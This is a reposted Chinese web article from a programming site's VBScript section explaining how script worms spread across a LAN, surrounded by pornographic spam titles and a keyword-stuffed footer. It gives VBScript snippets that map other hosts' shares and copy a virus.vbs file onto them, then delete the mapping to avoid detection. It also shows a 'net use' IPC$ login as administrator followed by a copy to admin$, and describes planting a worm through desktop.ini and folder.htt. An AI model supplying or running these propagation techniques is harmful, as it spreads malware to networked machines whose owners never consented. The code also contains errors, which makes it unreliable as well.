国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > VBScript > 正文

利用WSH里的MapNetworkDrive方法腳本蠕蟲的傳播方式

2020-06-26 18:03:48
字體:
供稿:網(wǎng)友
我近日在網(wǎng)絡(luò)上看到了一些關(guān)于局域網(wǎng)腳本蠕蟲的傳播方式的一些討論,這里提供一些思路。 
1. 利用WSH里的MapNetworkDrive方法。該方法是將網(wǎng)絡(luò)驅(qū)動(dòng)器映射到本地。 
MapNetworkDrive方法: 
object.MapNetworkDrive(strLocalName, strRemoteName, [bUpdateProfile], [strUser], [strPassword]) 
參數(shù) 
object  
WshNetwork 對象。  
strLocalName  
表示映射驅(qū)動(dòng)器的本地名的字符串值。  
strRemoteName  
表示共享的 UNC 名稱 (//xxx/yyy) 的字符串值。  
bUpdateProfile  
可選。表示映射信息是否存儲(chǔ)在當(dāng)前的用戶配置文件中的布爾值。如果提供的 bUpdateProfile 的值為 true,則該映射存儲(chǔ)在用戶的配置文件中(默認(rèn)值為 false)。  
strUser  
可選。表示用戶名的字符串值。如果使用當(dāng)前用戶以外的其他用戶的憑據(jù)來映射網(wǎng)絡(luò)驅(qū)動(dòng)器,則必須提供該參數(shù)。  
strPassword  
可選。表示用戶密碼的字符串值。如果使用當(dāng)前用戶以外的其他用戶的憑據(jù)來映射網(wǎng)絡(luò)驅(qū)動(dòng)器,則必須提供該參數(shù)。  
說明 
嘗試映射非共享的網(wǎng)絡(luò)驅(qū)動(dòng)器時(shí)將產(chǎn)生錯(cuò)誤。 
主要原理是:得到本機(jī)的LAN地址后(一般為192.168.*.*)將其他主機(jī)的共享目錄映射為本地的驅(qū)動(dòng)器(如Z:),然后將病毒復(fù)制到映射的本地驅(qū)動(dòng)器Z:,這樣就把病毒復(fù)制到其他主機(jī)的目錄去了。最后,還要使用RemoveNetworkDrive方法刪除映射,以免被發(fā)現(xiàn)。 
RemoveNetworkDrive方法: 
object.RemoveNetworkDrive(strName, [bForce], [bUpdateProfile]) 
參數(shù) 
object  
WshNetwork 對象。  
strName  
表示要?jiǎng)h除的映射驅(qū)動(dòng)器名的字符串值。strName 參數(shù)可以是本地名稱,也可以是遠(yuǎn)程名稱,這取決于驅(qū)動(dòng)器的映射方法。  
bForce  
可選。表示是否強(qiáng)制刪除映射驅(qū)動(dòng)器的布爾值。如果提供的 bForce 的值為 true,則無論該資源是否正在使用,該方法都刪除這些連接。  
bUpdateProfile  
可選。表示是否從用戶的配置文件中刪除映射的字符串值。如果提供 bUpdateProfile 且其值為 true,則從用戶配置文件中刪除該映射。bUpdateProfile 的默認(rèn)值為 false。  
說明 
如果在本地名稱(驅(qū)動(dòng)器名)和遠(yuǎn)程名稱(UNC 名稱)之間存在映射關(guān)系,則 strName 必須設(shè)置為本地名稱。如網(wǎng)絡(luò)路徑中不存在本地名稱(驅(qū)動(dòng)器字母)映射,則 strName 必須設(shè)為遠(yuǎn)程名稱。 
我這里給一段VBS的示例代碼: 
Set myfso= CreateObject("Scripting.FileSystemObject")  
Set WshNetwork = WScript.CreateObject("WScript.Network")  
WshNetwork.MapNetworkDrive "I:", "//" & unc  
fso.copyfile "c:/virus.vbs " ,"I:/virus.vbs.txt" 
WshNetwork.RemoveNetworkDrive "I:" 
2. 利用IPC$進(jìn)行連接。這種方式估計(jì)玩HACK的朋友比較熟悉啦!原理就是利用WSCRIPT.SHELL來執(zhí)行。具體可以參考各種IPC$攻擊傻瓜教程,這里僅提供一段代碼: 
Set objshell=wscript.createobject("wscript.shell") 
Dim st,sc 
st="net use //" & "192.168.0.1 /IPC$ "& pass &" /" & "administrator" 
objshell.run st 
sc="copy c:/virus.vbs //192.168.0.1/admin$" 
objshell.run sc 
3. 就是像“新歡樂時(shí)光”病毒一樣的利用FOLDER.HTT的被動(dòng)式進(jìn)行傳播。 
Desktop.ini: 活動(dòng)桌面的配置文件 
Desktop.ini定義了它所在的文件夾在桌面上或者在資源管理器中的顯示風(fēng)格以及文件夾的某些屬性。 
關(guān)鍵:WebViewTemplate.NT5=file://Folder.htt 
就是修改desktop.ini使其指向同目錄下的folder.htt,當(dāng)以WEB視圖打開文件夾時(shí),就會(huì)按照desktop.ini里面的設(shè)置執(zhí)行folder.htt。這樣我們就可以把病毒寫入folder.htt,使之不斷復(fù)制。 
具體參見其他有關(guān)新歡樂時(shí)光的病毒分析。 
發(fā)表評論 共有條評論
用戶名: 密碼:
驗(yàn)證碼: 匿名發(fā)表
主站蜘蛛池模板: 天祝| 岐山县| 津南区| 图们市| 沁水县| 同德县| 定南县| 盐山县| 尤溪县| 哈尔滨市| 隆化县| 桂林市| 师宗县| 宜州市| 郸城县| 百色市| 云林县| 重庆市| 石景山区| 区。| 郓城县| 遵义市| 德令哈市| 陈巴尔虎旗| 疏勒县| 涡阳县| 英吉沙县| 玉门市| 津南区| 林周县| 西昌市| 施秉县| 江川县| 思南县| 桑植县| 商城县| 金溪县| 红桥区| 信宜市| 安泽县| 遂川县|